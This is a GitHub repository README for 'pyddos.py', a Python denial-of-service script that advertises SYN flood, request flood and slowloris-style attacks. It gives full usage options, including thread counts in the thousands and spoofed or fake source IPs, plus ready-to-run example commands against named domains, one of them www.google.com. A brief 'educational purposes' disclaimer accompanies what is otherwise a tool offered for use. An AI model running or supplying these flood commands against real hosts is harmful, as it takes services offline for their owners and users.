Skip to content

Navigation Menu

Sign in
Sign up

Latest commit

History

31 Commits

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

pyddos.py

  • This is my new update
  • This script have 3 type of ddos attack : SYNFLOOD | REQUEST | Pyslow
  • Script has pyslow attack type which same like slowloris attack

Note

  • I worte this script for educational not for destructive purposes and illegal actions,so i won't responsible for that

Requires module

  • termcolor
  • colorama

Usage

 _ \ __ \ __ \ ___| _) | 
 | | | | | | | | _ \ __| \___ \ __| __| | __ \ __| 
 ___/ | | | | | | ( |\__ \ | ( | | | | | 
_| \__, |____/ ____/ \___/ ____/ _____/ \___|_| _| .__/ \__| 
 ____/ _| 
 
 DDos python script | Script used for testing ddos | Ddos attack 
 Author: ___T7hM1___ 
 Github: http://github.com/t7hm1/pyddos 
 Version:2.0 
usage: ./pyddos -t [target] -p [port] -t [number threads]
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
options:
-d <ip|domain> Specify your target such an ip or domain name
-t <float> Set timeout for socket
-T <int> Set threads number for connection (default = 1000)
-p <int> Specify port target (default = 80) |Only required with pyslow attack|
-s <int> Set sleep time for reconnection
-i <ip address> Specify spoofed ip unless use fake ip
-Request Enable request target
-Synflood Enable synflood attack
-Pyslow Enable pyslow attack
--fakeip Option to create fake ip if not specify spoofed ip
Example:
 ./pyddos -d www.example.com -p 80 -T 2000 -Pyslow
 ./pyddos -d www.domain.com -s 100 -Request
 ./pyddos -d www.google.com -Synflood -T 5000 -t 10.0

About

DDOS python script

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages

AltStyle によって変換されたページ (->オリジナル) /